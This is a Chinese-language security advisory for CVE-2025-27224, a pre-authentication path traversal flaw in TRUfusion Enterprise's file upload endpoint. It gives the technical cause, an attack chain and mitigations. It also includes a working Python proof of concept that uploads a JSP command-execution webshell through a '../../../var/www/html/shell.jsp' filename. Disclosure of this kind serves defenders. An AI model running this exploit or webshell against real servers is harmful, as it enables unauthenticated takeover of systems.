CVE-2025-27224: TRUfusion Enterprise路径遍历导致任意文件上传远程代码执行

漏洞信息

漏洞编号

CVE-2025-27224

漏洞类型

路径遍历/任意文件上传/远程代码执行

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

TRUfusion Enterprise

漏洞概述

CVE-2025-27224是TRUfusion Enterprise软件中的一个严重安全漏洞，CVSS评分高达9.8分（满分10分）。该漏洞存在于/trufusionPortal/fileupload文件上传端点，攻击者可以利用路径遍历（Path Traversal）技术，通过在文件名中注入../等序列，突破应用程序的文件上传限制，将任意文件写入服务器的任何位置。由于缺乏有效的输入验证和过滤，攻击者可以上传恶意文件（如WebShell）到可执行目录，从而在服务器上执行任意代码，实现完全的系统入侵。此漏洞无需任何认证即可被利用，属于预认证（Pre-Auth）类漏洞，攻击者可以通过网络直接发起攻击，对企业系统安全构成严重威胁。

技术细节

该漏洞的根本原因在于TRUfusion Enterprise的文件上传功能未对用户提供的文件名进行充分的安全验证。攻击者可以在文件名字段中插入路径遍历序列（如../或..\），使得应用程序在保存文件时将文件写入预期目录之外的位置。攻击者可以指定任意文件名和文件类型，并选择目标路径。例如，通过构造类似../../../var/www/html/shell.jsp的文件名，攻击者可以将恶意JSP文件写入Web服务器的文档根目录。一旦恶意文件被成功写入且位于Web可访问路径下，攻击者即可通过HTTP请求访问该文件，触发服务器执行其中的恶意代码，从而获得服务器的完全控制权。这种攻击方式结合了路径遍历和任意文件上传两种漏洞类型，形成了一条完整的RCE（远程代码执行）攻击链。

攻击链分析

STEP 1

步骤1

攻击者识别目标TRUfusion Enterprise服务器，访问/trufusionPortal/fileupload端点

STEP 2

步骤2

构造恶意文件上传请求，在文件名中注入路径遍历序列（如../../../var/www/html/shell.jsp）

STEP 3

步骤3

将包含恶意代码的文件（如WebShell）作为上传内容发送请求

STEP 4

步骤4

应用程序未验证文件名中的路径遍历序列，将恶意文件写入服务器任意位置（Web根目录）

STEP 5

步骤5

攻击者通过HTTP请求访问已写入的恶意文件，触发服务器执行其中的代码

STEP 6

步骤6

攻击者成功在服务器上执行任意命令，获得服务器的完全控制权

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-27224 PoC - TRUfusion Enterprise Path Traversal File Upload RCE
# Target: TRUfusion Enterprise <= 7.10.4.0
# Endpoint: /trufusionPortal/fileupload

TARGET = 'http://target.com'
# Path traversal to write webshell to web root
PAYLOAD_FILENAME = '../../../var/www/html/shell.jsp'
WEBSHELL = '<%@ page import="java.util.*,java.io.*"%><%if(request.getParameter("cmd")!=null){Process p=Runtime.getRuntime().exec(request.getParameter("cmd"));OutputStream os=p.getOutputStream();InputStream in=p.getInputStream();DataInputStream dis=new DataInputStream(in);String disr=dis.readLine();while(disr!=null){out.println(disr);disr=dis.readLine();}}%>'

def exploit():
    url = f'{TARGET}/trufusionPortal/fileupload'
    files = {
        'file': (PAYLOAD_FILENAME, WEBSHELL, 'application/octet-stream')
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
    }
    try:
        print(f'[*] Sending exploit to {url}')
        r = requests.post(url, files=files, headers=headers, timeout=10)
        if r.status_code == 200:
            print('[+] File uploaded successfully!')
            print(f'[+] Webshell location: {TARGET}/shell.jsp?cmd=whoami')
        else:
            print(f'[-] Upload failed with status: {r.status_code}')
    except Exception as e:
        print(f'[-] Error: {e}')

if __name__ == '__main__':
    exploit()

影响范围

TRUfusion Enterprise <= 7.10.4.0

防御指南

临时缓解措施

在厂商发布官方修复补丁之前，建议采取以下临时缓解措施：1）使用网络层访问控制，限制对/trufusionPortal/fileupload端点的访问，仅允许受信任的IP地址访问；2）暂时禁用文件上传功能，直到漏洞被修复；3）部署WAF规则检测并阻止包含../序列的请求参数；4）监控Web服务器的访问日志和文件系统变更，及时发现异常行为；5）考虑使用虚拟补丁技术，在应用层之前拦截恶意请求。